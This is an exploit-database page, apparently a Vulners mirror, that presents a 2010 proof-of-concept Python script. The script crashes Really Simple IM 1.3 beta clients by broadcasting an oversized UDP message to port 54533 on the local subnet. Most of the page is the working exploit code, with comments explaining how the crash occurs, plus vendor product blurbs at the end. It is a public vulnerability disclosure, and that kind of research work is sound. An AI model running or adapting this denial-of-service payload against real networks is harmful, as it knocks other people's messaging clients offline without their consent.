Lucene search
K

Really Simple IM 1.3beta - Denial of Service (PoC)

🗓️ 18 Jul 2010 00:00:00Reported by loneferretType 
exploitpack
 exploitpack
👁 12 Views

Denial of Service vulnerability in Really Simple IM 1.3 Beta crashes clients on the same subnet.

Code
#!/usr/bin/python

import socket
import sys

# Bug found: 18th July 2010
# DoS proof of concept
# Found  by: loneferret
# Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3 

# Really Simple IM verion 1.3 beta
# Software: http://code.google.com/p/reallysimpleim/
# Nods to exploit-db
# I don't want this on injector <- notice the no leet talk.

# This little application uses UDP to & send receive messages.
# It broadcasts everything, and picks up everything
# on port 54533.
# The funny thing with this PoC, it will crash all clients
# in the same subnet. Yup it's that funny. That's the only thing it does too...
# No EIP, no SEH but the buffer is still in memory at the
# moment of the crash. Figured I'd share anyway.


#Commands
# 'p' Connect and adds users to list
# 'a' Disconnect message
# 'b' Send message
# 't' Direct message

host = '192.168.xxx.255'  #Adjust broadcast address to your network
port = 54533

buffer



try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.bind((host,0))
   s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
except:
   print "socket() failed"
   sys.exit(1)

da = "p"
da += "W00T" + ("\x41" * 10000)
s.sendto(da, (host, port))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation